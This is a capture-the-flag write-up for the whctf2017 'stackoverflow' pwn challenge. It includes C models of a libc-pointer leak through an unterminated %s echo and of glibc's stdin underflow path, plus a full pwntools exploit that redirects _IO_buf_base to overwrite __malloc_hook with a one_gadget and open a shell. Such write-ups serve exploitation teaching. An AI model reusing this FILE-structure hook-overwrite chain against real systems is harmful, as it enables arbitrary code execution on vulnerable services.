whctf2017_stackoverflow
The challenge I did a few days ago was written up almost entirely by following master zikh26's article; I'm still too green, and have only just started reading the source.
Protections
Vulnerability analysis
It lets us leak the address we want, and there is also one chance to write a single zero byte to an arbitrary address.
Approach
1. Use the fact that %s keeps printing until it hits a NUL: with no terminator after the name, it runs on into the following qword and gives us a libc address.
2. There is one chance to write a zero; because re-entering v1 does not change v2, this becomes a single zero byte written to an arbitrary address.
3. The program has an IO_gets()-style input routine that can be called repeatedly to advance _IO_read_ptr one byte at a time until fp->_IO_read_ptr == fp->_IO_read_end; the next underflow then read()s fresh input into fp->_IO_buf_base.
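The %s leak from step 1, as an added example that is not part of the original write-up: the name buffer is modelled as a struct member with a libc-looking qword directly behind it (a constructed value, not the real _IO_2_1_stdout_ address), the unterminated 0x20-byte read is shown beside a terminated one, and the receiving side rebuilds the qword from the over-long echo the way the script's recv_libc() would. Little-endian x86-64 byte order is assumed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Stack layout the leak relies on: the 0x20-byte name buffer is directly
 * followed by a qword holding a libc pointer. Modelled as a struct so the
 * adjacency does not depend on how the compiler lays out locals. */
struct name_frame {
    char     name[0x20];
    uint64_t next_qword;          /* the pointer that follows the buffer */
};

/* Constructed stand-in for the _IO_2_1_stdout_ address behind the name. */
#define FAKE_STDOUT_PTR 0x00007ffff7dd2620ULL

/* vulnerable: read(0, name, 0x20) with no terminator, echoed with "%s" */
static void fill_name_vuln(struct name_frame *fr, const char *input, size_t len)
{
    if (len > sizeof fr->name) len = sizeof fr->name;
    memcpy(fr->name, input, len);     /* 0x20 bytes: no NUL left in the buffer */
}

/* hardened: leave room for the terminator and always write it */
static void fill_name_safe(struct name_frame *fr, const char *input, size_t len)
{
    if (len > sizeof fr->name - 1) len = sizeof fr->name - 1;
    memcpy(fr->name, input, len);
    fr->name[len] = '\0';
}

/* What "%s" actually prints: strlen() from the start of the buffer,
 * which walks straight into next_qword when no NUL stops it. */
static size_t echoed_length(const struct name_frame *fr)
{
    return strlen((const char *)fr + offsetof(struct name_frame, name));
}

/* Receiving side: take the bytes echoed past the 0x20-byte name and rebuild
 * the little-endian qword. Returns 0 when nothing leaked. */
static uint64_t leaked_pointer(const struct name_frame *fr)
{
    const unsigned char *p = (const unsigned char *)fr;
    size_t n = echoed_length(fr);
    uint64_t v = 0;
    for (size_t i = 0; i + sizeof fr->name < n && i < 8; i++)
        v |= (uint64_t)p[sizeof fr->name + i] << (8 * i);
    return v;
}

size_t g_vuln_len;   /* bytes "%s" echoes in the vulnerable version */
size_t g_safe_len;   /* bytes "%s" echoes in the hardened version   */

/* Runs both versions on the same "a"*0x20 input; returns the leaked qword. */
uint64_t demo_leak(void)
{
    struct name_frame vuln, safe;
    char input[0x20];
    memset(input, 'a', sizeof input);        /* the "a"*0x20 the exploit sends */

    memset(&vuln, 0, sizeof vuln);
    vuln.next_qword = FAKE_STDOUT_PTR;
    fill_name_vuln(&vuln, input, sizeof input);
    g_vuln_len = echoed_length(&vuln);       /* 0x20 + 6 non-zero pointer bytes */

    memset(&safe, 0, sizeof safe);
    safe.next_qword = FAKE_STDOUT_PTR;
    fill_name_safe(&safe, input, sizeof input);
    g_safe_len = echoed_length(&safe);       /* stops at the terminator */

    return leaked_pointer(&vuln);
}

int main(void)
{
    uint64_t leak = demo_leak();
    printf("vulnerable echo: %zu bytes, leaked 0x%016llx\n",
           g_vuln_len, (unsigned long long)leak);
    printf("hardened echo:   %zu bytes\n", g_safe_len);
    return 0;
}
```

Only six bytes of the pointer leak because the top two bytes of a user-space x86-64 address are zero, which is exactly where strlen() stops; that is why a receiver has to pad the leaked bytes back up to a full qword.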
The call chain for scanf is scanf -> vfscanf -> __uflow -> _IO_default_uflow -> __underflow -> _IO_file_underflow, which in the end calls read(). Before reading, _IO_file_underflow points the read window (_IO_read_base, _IO_read_ptr, _IO_read_end) at _IO_buf_base, so the line that turns it into an arbitrary write is

count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);

i.e. once _IO_buf_base and _IO_buf_end are under our control, read() writes whatever we send to the address we chose. One check has to be bypassed first: as long as unread bytes remain in the buffer, underflow hands them back and never calls read():

if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;
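The underflow path above, replayed against a model (added here; not code from the write-up and not glibc's source). The struct keeps glibc's x86-64 _IO_FILE field order for the first 0x48 bytes, _IO_SYSREAD is replaced by a queue of constructed sends, and the precondition that the one-byte zero write has already pulled _IO_buf_base back onto _IO_write_base is assumed rather than derived from the binary. The run shows all three parts: the refill writes the a/b/c/p64/p64 payload over the FILE fields, a premature underflow is served from the buffer and never reaches read(), and once the buffered bytes are drained the next refill read()s 8 bytes straight into the hook.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Head of glibc's struct _IO_FILE with the same field order and offsets
 * as on x86-64 (the first 0x48 bytes of the real struct). */
struct model_file {
    int   flags;
    int   pad;            /* keeps the pointers 8-byte aligned, as in glibc */
    char *read_ptr;       /* 0x08 */
    char *read_end;       /* 0x10 */
    char *read_base;      /* 0x18 */
    char *write_base;     /* 0x20 */
    char *write_ptr;      /* 0x28 */
    char *write_end;      /* 0x30 */
    char *buf_base;       /* 0x38: where underflow read()s to   */
    char *buf_end;        /* 0x40: how much it asks read() for  */
};

/* Constructed stand-in for the pipe the exploit script writes to: one read()
 * drains at most one queued send, as when the script waits for each prompt. */
struct msg { const unsigned char *data; size_t len; };
static struct msg g_pipe[8];
static size_t g_nmsg, g_cur, g_off;

static void pipe_send(const void *data, size_t len)
{
    g_pipe[g_nmsg++] = (struct msg){ data, len };
}

static long model_sysread(char *dst, size_t n)      /* _IO_SYSREAD(fp, ...) */
{
    if (g_cur >= g_nmsg)
        return 0;                                   /* EOF */
    size_t avail = g_pipe[g_cur].len - g_off;
    if (n > avail)
        n = avail;
    memcpy(dst, g_pipe[g_cur].data + g_off, n);
    g_off += n;
    if (g_off == g_pipe[g_cur].len) { g_cur++; g_off = 0; }
    return (long)n;
}

/* The two parts of _IO_new_file_underflow the write-up relies on. */
static int model_underflow(struct model_file *fp)
{
    if (fp->read_ptr < fp->read_end)                /* the check to bypass */
        return (unsigned char)*fp->read_ptr;
    fp->read_base = fp->read_ptr = fp->buf_base;    /* reset the read window */
    fp->read_end = fp->buf_base;
    long count = model_sysread(fp->buf_base, (size_t)(fp->buf_end - fp->buf_base));
    if (count <= 0)
        return EOF;
    fp->read_end += count;
    return (unsigned char)*fp->read_ptr;
}

/* one byte of a gets()-style input loop: serve from buffer, refill when empty */
static int model_getc(struct model_file *fp)
{
    if (fp->read_ptr >= fp->read_end && model_underflow(fp) == EOF)
        return EOF;
    return (unsigned char)*fp->read_ptr++;
}

size_t   g_drained;             /* getc() calls needed to empty the buffer */
uint64_t g_hook_before_drain;   /* hook value after the premature underflow */

/* Replays the two-stage write against the model; returns what lands in hook. */
uint64_t run_attack(void)
{
    static uint64_t hook;                           /* stands in for __malloc_hook */
    struct model_file f;
    unsigned char stage1[40], stage2[8];
    uint64_t hook_addr = (uint64_t)(uintptr_t)&hook, hook_end = hook_addr + 8;
    const uint64_t gadget = 0xdeadbeefcafebabeULL;  /* plays the one_gadget address */

    hook = 0;
    g_nmsg = g_cur = g_off = 0;
    memset(&f, 0, sizeof f);

    /* Assumed precondition: the zero write already moved buf_base back inside
     * the struct, onto write_base, so the next refill overwrites
     * write_base .. buf_end (0x28 bytes) with attacker bytes. */
    f.buf_base = (char *)&f.write_base;
    f.buf_end  = (char *)(&f + 1);

    /* stage 1: 'a'*8 + 'b'*8 + 'c'*8 + p64(malloc_hook) + p64(malloc_hook+8) */
    memset(stage1, 'a', 8);
    memset(stage1 + 8, 'b', 8);
    memset(stage1 + 16, 'c', 8);
    memcpy(stage1 + 24, &hook_addr, 8);             /* host order == p64() on x86-64 */
    memcpy(stage1 + 32, &hook_end, 8);
    pipe_send(stage1, sizeof stage1);
    model_getc(&f);                                 /* refill lands on &f.write_base */

    /* buf_base/buf_end now point at hook, but 39 payload bytes are still buffered */
    memcpy(stage2, &gadget, 8);
    pipe_send(stage2, sizeof stage2);
    model_underflow(&f);                            /* premature: no read() happens */
    g_hook_before_drain = hook;

    for (g_drained = 0; f.read_ptr < f.read_end; g_drained++)
        model_getc(&f);                             /* the throw-away inputs */

    model_getc(&f);                                 /* buffer empty: read() into hook */
    return hook;
}

int main(void)
{
    printf("hook = 0x%016llx after %zu drain reads\n",
           (unsigned long long)run_attack(), g_drained);
    return 0;
}
```

The 0x28-byte request in stage 1 is just the model's struct size; in the real target the request is whatever _IO_buf_end - _IO_buf_base came out to after the zero write, and read() returns only the 40 bytes actually sent, which is what sets _IO_read_end.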
exp
from pwn import *
from tools import *   # the author's own helper module wrapping pwntools: load(), recv_libc(), log_addr(), debug(), search_og()

context.log_level = 'debug'
p, e, libc = load("a")

# 1. leak: the 0x20-byte name has no terminator, so the %s that echoes it runs
#    on into the following qword, a pointer to _IO_2_1_stdout_
p.sendafter("leave your name, bro:", "a" * 0x20)
libc_base = recv_libc() - libc.sym['_IO_2_1_stdout_']
log_addr('libc_base')
malloc_hook = libc_base + libc.symbols['__malloc_hook']

# 2. the single zero write: the first value is remembered (v2) and used as the
#    zero-write index; the re-entered second value is the size the program goes on with
p.sendlineafter("please input the size to trigger stackoverflow: ", str(0x5c5908))
p.sendlineafter("please input the size to trigger stackoverflow: ", str(0x200000))
p.sendlineafter("padding and ropchain: ", "b" * 0x10)   # the overflow itself is not used for ROP here
debug(p, 0x400A45, 0x4008FF)   # breakpoints used while developing the exploit

# 3. stdin's buffer now starts inside its own FILE struct, so the scanf behind the
#    size prompt underflows and read()s this payload over the FILE fields: three
#    filler qwords (by the struct layout, _IO_write_base/_IO_write_ptr/_IO_write_end),
#    then _IO_buf_base = __malloc_hook and _IO_buf_end = __malloc_hook + 8
p.sendafter("please input the size to trigger stackoverflow: ",
            b'a' * 8 + b'b' * 8 + b'c' * 8 + p64(malloc_hook) + p64(malloc_hook + 0x8))
p.sendlineafter("padding and ropchain: ", p64(0xdeadbeef))   # dummy

# 4. the rest of the 40-byte payload is still buffered; each of these inputs is
#    served from the buffer (advancing _IO_read_ptr) and never reaches read()
for i in range(39):
    p.sendlineafter("please input the size to trigger stackoverflow: ", '1')

# 5. _IO_read_ptr == _IO_read_end: this underflow read()s 8 bytes straight into
#    __malloc_hook, and the next malloc jumps to the one_gadget
p.sendlineafter("please input the size to trigger stackoverflow: ", p64(search_og(3) + libc_base))
p.interactive()
References
whctf2017 pwn writeup | ZIKH26's Blog
From: https://www.cnblogs.com/trunk/p/16997332.html